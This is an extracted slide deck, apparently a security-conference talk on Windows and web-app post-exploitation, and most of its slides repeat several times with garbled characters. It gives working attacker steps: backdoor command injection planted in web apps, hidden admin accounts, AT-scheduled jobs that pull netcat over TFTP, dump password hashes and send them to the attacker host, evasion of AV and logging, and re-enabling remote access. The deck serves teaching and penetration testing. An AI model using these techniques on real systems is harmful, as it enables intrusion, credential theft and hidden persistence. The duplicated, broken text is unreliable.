ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
